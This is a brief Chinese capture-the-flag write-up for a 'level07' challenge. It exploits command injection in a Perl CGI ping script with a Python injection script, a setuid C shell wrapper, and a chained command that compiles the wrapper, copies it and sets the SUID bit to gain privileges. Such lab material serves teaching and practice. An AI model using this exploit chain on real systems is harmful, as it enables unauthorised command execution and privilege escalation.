題目源碼爲一段perl腳本:
#!/usr/bin/perl
use CGI qw{param};
print "Content-type: text/html\n\n";
sub ping {
$host = $_[0];
print("<html><head><title>Ping results</title></head><body><pre>");
@output = `ping -c 3 $host 2>&1`;
foreach $line (@output) { print "$line"; }
print("</pre></body></html>");
}
# check if Host set. if not, display normal page, etc
ping(param("Host"));第12行@output = `ping -c 3 $host 2>&1`;對參數host未做控制,可輸入任意命令執行。
在/home/level07目錄下創建cmd.py文件:
#!/usr/bin/python
import urllib
import sys
host = "localhost -c3;"
cmd = sys.argv[1]
payload = host + cmd
final = urllib.urlencode({'Host':payload})
f = urllib.urlopen("http://localhost:7007/index.cgi?%s", final)
print f.read()
#include <stdlib.h>
#include <unistd.h>
#include <sys/types.h>
#include <stdio.h>
int main(int argc, char **argv, char **envp)
{
gid_t gid;
uid_t uid;
gid = getegid();
uid = geteuid();
setresgid(gid, gid, gid);
setresuid(uid, uid, uid);
system("/bin/bash");
}輸入參數,運行cmd.py文件:
./cmd.py "gcc -o /tmp/level07 /tmp/level07.c;chmod u+s,a+x /tmp/level07;cp /tmp/level07 /home/flag07/;chmod u+s /home/flag07/level07"此時在/home/flag07目錄下創建level07文件,並且設置了SUID屬性,運行,提權成功。